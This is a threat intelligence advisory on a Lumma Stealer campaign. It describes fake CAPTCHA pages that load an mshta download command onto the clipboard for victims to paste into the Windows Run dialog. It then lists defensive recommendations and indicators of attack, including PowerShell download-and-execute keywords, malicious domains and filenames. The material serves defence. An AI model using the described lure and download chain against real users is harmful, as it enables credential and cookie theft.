Lumma Stealer Campaign: Fake Captcha Lures And Evasion Techniques Uncovered

Published Date: May 13, 2025
Category: ShadowOpsIntel
Share:

The Lumma Stealer, a commodity infostealer malware that is actively evolving. Threat actors are deploying fake CAPTCHAs and other innovative methods to bypass traditional security layers. The malware is distributed via phishing campaigns and malvertising, and its primary goal is to exfiltrate credentials, cookies, and sensitive system information.

Severity Level: High

THREAT OVERVIEW:

  1. Malware Involved:
    o Lumma Stealer (also known as LummaC2), typically delivered via loaders or exploit kits.
    o Lumma is a malware that works in the malware-as-a-service (MaaS) model and has existed since at least 2022.
  2. Attack Details:
    Initial Vector:
    o Victims are lured through malvertising and rogue websites.
    o Redirection to fake CAPTCHA pages that simulate user interaction.
    Social Engineering Tactic:
    o CAPTCHA instructs users to open the Windows Run dialog (Win+R) and paste clipboard content, unknowingly executing malicious commands.
    o A JavaScript snippet silently adds the payload download command to the clipboard.
    Payload Delivery:
    o Command uses mshta.exe (a known LOLBIN) to fetch and run a remote HTA file, initiating malware installation.
    o Payloads observed include components that bypass Windows AMSI protections.
    Malware Execution:
    o Payload downloads and executes Lumma Stealer, which exfiltrates credentials, cookies, and crypto data.
    o Some variants include open-source AMSI bypass code to prevent detection by antivirus/EDR solutions.

Recommendations:

  1. Regularly update software to mitigate known CVEs that could aid initial access.
  2. Restrict execution of unapproved or unsigned executables and DLLs to prevent unauthorized code from running.
  3. Block access to high-risk categories like cracked software and file-sharing platforms.
  4. Train users to identify fake CAPTCHAs and suspicious software sources.
  5. Look for below indicators of attack:
    • PowerShell commands with parameters like Invoke-Expression, Invoke-WebRequest, iex, FromBase64String
    • Execution of AutoIt3.exe or AutoIt*.exe from %TEMP%
    • PE files executing .a3x scripts or downloading remote content
    • Referrer headers or URLs containing: camplytic.com/go/ OR exo.io/store-as/ OR aliyuncs.com/new-artist.txt
    • .lnk file launching powershell.exe, mshta.exe, or sftp.exe
    • PowerShell launched via Run dialog. Detection Trigger: explorer.exe -> powershell.exe
    • Filenames: Instruction_695-18014-012_Rev.PDF.lnk, ArtistSponsorship.exe
  6. Block the IOCs at their respective controls: https://www.virustotal.com/gui/collection/282c17a838f62b2ca1e0fdc9fdd0c02a2f4e286eac8843e84ed6353cbb66c366/iocs

Source:

  • https://news.sophos.com/en-us/2025/05/09/lumma-stealer-coming-and-going/
  • https://www.netskope.com/blog/lumma-stealer-fake-captchas-new-techniques-to-evade-detection
  • https://blog.qualys.com/vulnerabilities-threat-research/2024/10/20/unmasking-lumma-stealer-analyzing-deceptive-tactics-with-fake-captcha

Enjoyed reading this Threat Intelligence Advisory? Stay updated with our latest exclusive content by following us on Twitter and LinkedIn

No related posts found.

Ampcus Cyber
Privacy Overview

This website uses cookies so that we can provide you with the best user experience possible. Cookie information is stored in your browser and performs functions such as recognising you when you return to our website and helping our team to understand which sections of the website you find most interesting and useful.